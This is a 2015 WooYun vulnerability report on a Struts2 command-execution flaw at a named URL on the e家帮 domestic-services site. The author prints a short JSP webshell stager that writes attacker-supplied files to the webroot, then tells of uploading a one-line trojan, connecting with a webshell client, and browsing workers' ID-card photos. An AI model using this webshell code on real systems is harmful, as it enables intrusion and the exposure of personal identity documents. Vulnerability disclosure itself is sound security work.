当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131451

漏洞标题:e家帮一处命令执行可getshell(涉及大量钟点工信息/身份证照片)

相关厂商:e家帮

漏洞作者: 佳佳佳佳佳

提交时间:2015-08-04 08:52

修复时间:2015-09-18 08:54

公开时间:2015-09-18 08:54

漏洞类型:内容安全

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

e家帮一处命令执行可getshell(涉及大量员工信息/身份证照片)

详细说明:

今天晚上我们来个睡前小故事:
某日碰见了这样一个点:http://www.ejbang.com/weixin/demo/tocreatedemocleanorder.do
随手友情测试后发现——泥煤,structs 2命令执行...
并且直接是root权限,有图有真相:

1.jpg


既然可以命令执行,那么接下来get一下shell(嗯,好像有点坏)。
脚本代码:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>


继续写入一句话...
然后就这样没有一点点防备地shell了~
shell之后我们拿出早已磨好的菜刀,开始连上我们上的mu~ma

2.jpg


爷第一次上马,有点小忐忑,来点掌声鼓励一下可好?
随手翻了翻,我了个去,为何这么多身份证照片...大半夜看得我有点害怕(不要问我为什么怕TAT),这里就甩一两张好了,生来不会打码,看看就好

3.jpg


4.jpg


好了,故事讲完了,好像该睡觉了的说。

漏洞证明:

1.jpg


2.jpg


3.jpg


4.jpg

修复方案:

http://struts.apache.org/docs/s2-016.html
good good study,day day up。

版权声明:转载请注明来源 佳佳佳佳佳@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)